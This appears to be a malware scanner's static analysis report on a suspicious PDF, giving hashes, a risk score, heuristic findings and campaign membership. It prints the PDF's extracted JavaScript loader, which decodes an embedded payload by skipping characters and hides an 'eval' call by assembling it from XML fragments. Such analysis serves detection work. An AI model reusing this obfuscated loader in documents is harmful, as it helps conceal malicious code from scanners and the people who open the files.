PDF static analysis report

Static analysis result for SHA-256 e08e1f6cb4acb334…

SUSPICIOUS

PDF

1.4 KB First seen: 2026-05-03
MD5: 60e6da0467adec1e3ea5f6c12497a074 SHA-1: c4ea4181f48fd2674919c695b8d6622993dca18a SHA-256: e08e1f6cb4acb334623a40870c31ff824f8a1c7953a147bac08860ef3ab80e2b
54 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 3

  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
🗂 Part of campaign: shared payload 1bc4bf38a7 55 samples

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x1CC 254 bytes
SHA-256: 1bc4bf38a788adcc495fb84f1f085cb4c62f9f214ddac09c9e3dd447973e35e6
Preview script
First 1,000 lines of the extracted script
ra=this.getDataObjectContents("xampp");rb=util.stringFromStream(ra, "utf-8");rc="";for (i=0;i<rb.length;i +=18){   rc +=rb.charAt(i);}rd="<test><one>ev</one><two>al</two></test>";re=XMLData.parse(rd);        rf=re.one.value+re.two.value;this[rf](rc);